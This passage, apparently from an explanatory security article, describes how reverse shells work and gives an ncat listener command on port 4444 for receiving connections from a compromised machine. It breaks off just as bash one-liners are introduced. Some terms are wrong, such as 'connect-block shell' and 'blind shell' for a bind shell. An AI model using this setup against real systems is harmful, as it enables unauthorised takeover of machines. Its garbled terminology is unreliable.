Reverse Shell takes advantage of the target system's vulnerabilities to initiate a shell session and then access the victim's computer. It is also known as a “remote shell” or “connect-block shell”.
Reverse shells allow attackers to open ports to the target machines, forcing communication and enabling a complete takeover of the target machine. Therefore it is a severe security threat.
The goal is to connect to a remote computer and redirect the input and output connections of the target system’s shell so the attacker can access it remotely.
For the establishment of a typical remote shell, the machine controlled by the attackers must connect to a remote host and request a shell session, also known as a blind shell.
But what if the remote host is not directly accessible i.e. If it does not have a public IP or it is protected by a firewall? In this situation, A reverse sell is used, where the target machine initiates an outgoing connection to a listening network host and a shell session is established.
To create a reverse shell, you need to open a client machine port that is accessible from the Internet. Then, you need to run a listener on the client machine. Finally, you need to run a command on the server that establishes a connection with the client listener.
To create a reverse shell you need a listener on your local machine with a public IP.
example:
ncat -l -p 4444
This establishes the listener on TCP port 4444.
Let’s assume that the user’s machine is available at some IP address <IP address>. The following one-liners executed on the compromised target machine create a reverse shell connection with the attacker’s machine:
Bash Reverse Shell
If the target machine runs Linux, it’s a good idea to start with bash, as nearly all Linux systems come with this system shell: